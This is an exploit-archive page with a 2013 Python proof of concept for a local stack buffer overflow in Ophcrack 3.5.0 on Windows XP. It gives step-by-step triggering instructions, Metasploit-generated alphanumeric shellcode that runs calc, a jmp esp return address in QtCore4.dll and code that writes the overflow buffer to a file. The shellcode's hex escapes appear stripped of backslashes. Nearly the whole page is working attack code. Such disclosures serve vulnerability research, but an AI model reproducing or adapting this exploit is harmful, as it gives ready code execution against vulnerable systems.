[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Ophcrack 3.5.0 - Local Code Execution BOF
# Published : 2013-05-21
# Author :
# Previous Title : Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution
# Next Title : Adrenalin Player 2.2.5.3 - Buffer Overflow Exploit (SEH)


# Exploit Title: ophcrack v3.5.0 - Local Code Execution BOF
# Date: 21.05.2013
# Exploit Author: xis_one@STM Solutions
# Vendor Homepage:  http://ophcrack.sourceforge.net/
# Software Link: http://downloads.sourceforge.net/ophcrack/ophcrack-#win32-installer-3.5.0.exe
# Version: 3.5.0 
# Tested on: Windows XP SP3 Eng (32bits)

#!/usr/bin/python

#Stack based buffer overflow - direct EIP overwrite in this case (SEH based exploitation is possible as well)
#In order to exploit go to: Load -> Remote SAM -> put the content of buffer.txt file generated by this exploit into the "Host name:" field -> "Don't send" once you see the crash.
#pwdump6_setup.exe will be run by ophrack.It will nicely crash and execute the payload.
#pwdump6_setup itself doesn't look to be exploitable outside of ophrack.
#Kudos to Hostess for pointing me to #http://www.mattandreko.com/2013/04/buffer-overflow-in-hexchat-294.html



shellcode = (
#windows/exec EXITFUNC=seh CMD=calc R | msfencode -e x86/alpha_mixed bufferregister=esp -t c
"x54x59x49x49x49x49x49x49x49x49x49x49x49x49x49"
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41x6b"
"x41x41x51x32x41x42x32x42x42x30x42x42x41x42x58"
"x50x38x41x42x75x4ax49x69x6cx79x78x6cx49x57x70"
"x65x50x65x50x75x30x6ex69x7ax45x44x71x7ax72x75"
"x34x4ex6bx46x32x30x30x4ex6bx56x32x34x4cx4ex6b"
"x36x32x54x54x4ex6bx73x42x71x38x36x6fx48x37x32"
"x6ax36x46x75x61x69x6fx34x71x49x50x6ex4cx55x6c"
"x30x61x61x6cx45x52x44x6cx57x50x6fx31x78x4fx56"
"x6dx47x71x69x57x7ax42x6ax50x31x42x46x37x4ex6b"
"x71x42x66x70x6ex6bx43x72x35x6cx66x61x58x50x6e"
"x6bx37x30x54x38x6ex65x6fx30x31x64x53x7ax56x61"
"x4ex30x66x30x6ex6bx50x48x65x48x4ex6bx30x58x65"
"x70x46x61x7ax73x6ax43x35x6cx43x79x6ex6bx46x54"
"x6ex6bx75x51x7ax76x75x61x49x6fx66x51x6bx70x4c"
"x6cx49x51x68x4fx66x6dx77x71x48x47x44x78x6bx50"
"x62x55x7ax54x34x43x61x6dx4ax58x67x4bx53x4dx66"
"x44x71x65x49x72x72x78x6ex6bx73x68x44x64x53x31"
"x5ax73x43x56x6ex6bx54x4cx30x4bx4ex6bx73x68x35"
"x4cx56x61x4bx63x4cx4bx66x64x6cx4bx46x61x58x50"
"x4fx79x32x64x56x44x54x64x73x6bx63x6bx65x31x31"
"x49x72x7ax62x71x49x6fx69x70x62x78x31x4fx30x5a"
"x6cx4bx44x52x5ax4bx4bx36x51x4dx53x5ax67x71x6c"
"x4dx4bx35x78x39x75x50x35x50x45x50x42x70x30x68"
"x35x61x6ex6bx42x4fx4dx57x79x6fx69x45x4dx6bx6b"
"x4ex66x6ex54x72x59x7ax43x58x59x36x4dx45x6dx6d"
"x4fx6dx39x6fx5ax75x75x6cx34x46x73x4cx57x7ax6d"
"x50x4bx4bx49x70x61x65x44x45x4fx4bx61x57x74x53"
"x32x52x52x4fx31x7ax43x30x36x33x39x6fx49x45x50"
"x63x65x31x32x4cx63x53x43x30x41x41")

#!mona jmp -r esp -cp ascii -> 0x6e2a2936 : jmp esp  asciiprint,ascii {PAGE_EXECUTE_READ} [QtCore4.dll]


jmp="x36x29x2ax6e" 
buffer = "A"*497 + jmp + shellcode

print(buffer)

file = open('exploit.txt','w')
file.write(buffer)
file.close()